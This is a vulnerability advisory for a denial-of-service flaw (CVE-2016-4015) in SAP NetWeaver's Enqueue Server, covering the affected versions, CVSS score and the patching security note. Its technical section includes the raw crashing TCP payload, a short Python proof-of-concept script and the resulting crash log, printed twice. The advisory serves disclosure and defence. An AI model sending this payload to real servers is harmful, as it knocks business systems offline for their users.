ERPScanERPSCAN-16-019SAP NetWeaver Enqueue Server - DoS vulnerability
0.002 Low
EPSS
Percentile
64.9%
Application: SAP AS JAVA **Versions Affected:**SAP AS JAVA 7.1 – 7.4 **Vendor URL: **SAP **Bugs:**Denial of Service **Reported:**04.12.2015 **Vendor response: **05.12.2015 **Date of Public Advisory: **12.04.2016 **Reference: **SAP Security Note 2258784 **Author: ** Vahagn Vardanyan (ERPScan)
VULNERABILITY INFORMATION
Class: denial of service
Impact: denial of service
Remotely Exploitable: Yes
Locally Exploitable: No
CVE: CVE-2016-4015
CVSS Information
CVSS v3 Base Score: 7.5 / 10
CVSS v3 Base Vector:
| AV: Attack Vector (Related exploit range) | Network (N) |
|---|---|
| AC: Attack Complexity (Required attack complexity) | Low (L) |
| PR: Privileges Required (Level of privileges needed to exploit) | None (N) |
| UI: User Interaction (Required user participation) | None (N) |
| S: Scope (Change in scope due to impact caused to components beyond the vulnerable component) | Unchanged (U) |
| C: Impact to Confidentiality | None (N) |
| I: Impact to Integrity | None (N) |
| A: Impact to Availability | High (H) |
Description
Anonymous attacker can use a special request to cause a denial of service in SAP Enqueue.
Business risk
An attacker can use a Denial of service vulnerability to terminate a process of the vulnerable component. For this time, nobody can use this service, which negatively influences on business processes, system downtime, and business reputation as result.
VULNERABLE PACKAGES
SAP NetWeaver Enqueue Server 7.4
Other versions are probably affected too, but they were not checked.
SOLUTIONS AND WORKAROUNDS
To correct this vulnerability, install SAP Security Note 2258784
TECHNICAL DESCRIPTION
Enqueue Server allows an anonymous attacker to prevent legitimate users from accessing the service, either by crashing or flooding it.
To reproduce this vulnerability, send to Enqueue server the following TCP data
00000000: 00 00 00 59 ab cd e1 23 00 00 00 00 00 00 00 59 |…Y…#…Y| 00000010: 00 00 00 59 f3 a0 81 bb 06 01 00 00 00 00 00 06 |…Y…| 00000020: 00 00 00 00 00 04 00 00 00 00 00 01 00 04 00 00 |…| 00000030: 00 00 00 03 56 61 68 61 67 6e 2d 70 63 5f 35 32 |…Vahagn-pc_52| 00000040: 37 36 5f 30 00 00 00 00 02 00 00 00 3b 00 00 00 |76_0…;…| 00000050: 05 00 00 00 03 00 00 00 06 00 00 00 04 00 00 00 |…| 00000060: 01 |.| PoC import socket poc = “00000059abcde123000000000000005900000059f3a081bb0601000000000006000000000004000000000001000400000000000356616861676e2d70635f353237365f3000000000020000003b0000000500000003000000060000000400000001” for i in range(10): try: sock = socket.socket() sock.connect((SERVER_IP, SERVER_PORT)) sock.send(poc.decode(“hex”)) data = sock.recv(1024) sock.close() except Exception, ex: ex.message Faulting application name: enserver.EXE, version: 7420.28.23.32800, time stamp: 0x547621ad Faulting module name: enserver.EXE, version: 7420.28.23.32800, time stamp: 0x547621ad Exception code: 0xc0000005 Fault offset: 0x000000000001e953 Faulting process id: 0xa14 Faulting application start time: 0x01d0b50f71a9570b Faulting application path: C:\usr\sap\DM0\SCS01\exe\enserver.EXE Faulting module path: C:\usr\sap\DM0\SCS01\exe\enserver.EXE Report Id: b8083bbb-2102-11e5-959f-000c29a7eeb7
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
|
00000000: 00 00 00 59 ab cd e1 23 00 00 00 00 00 00 00 59 |…Y…#…Y|
00000010: 00 00 00 59 f3 a0 81 bb 06 01 00 00 00 00 00 06 |…Y…|
00000020: 00 00 00 00 00 04 00 00 00 00 00 01 00 04 00 00 |…|
00000030: 00 00 00 03 56 61 68 61 67 6e 2d 70 63 5f 35 32 |…Vahagn-pc_52|
00000040: 37 36 5f 30 00 00 00 00 02 00 00 00 3b 00 00 00 |76_0…;…|
00000050: 05 00 00 00 03 00 00 00 06 00 00 00 04 00 00 00 |…|
00000060: 01 |.|
PoC
import socket
poc = “00000059abcde123000000000000005900000059f3a081bb0601000000000006000000000004000000000001000400000000000356616861676e2d70635f353237365f3000000000020000003b0000000500000003000000060000000400000001”
for i in range(10):
try:
sock = socket.socket()
sock.connect((SERVER_IP, SERVER_PORT))
sock.send(poc.decode(“hex”))
data = sock.recv(1024)
sock.close()
except Exception, ex:
ex.message
Faulting application name: enserver.EXE, version: 7420.28.23.32800, time stamp: 0x547621ad
Faulting module name: enserver.EXE, version: 7420.28.23.32800, time stamp: 0x547621ad
Exception code: 0xc0000005
Fault offset: 0x000000000001e953
Faulting process id: 0xa14
Faulting application start time: 0x01d0b50f71a9570b
Faulting application path: C:\usr\sap\DM0\SCS01\exe\enserver.EXE
Faulting module path: C:\usr\sap\DM0\SCS01\exe\enserver.EXE
Report Id: b8083bbb-2102-11e5-959f-000c29a7eeb7
—|—
Related
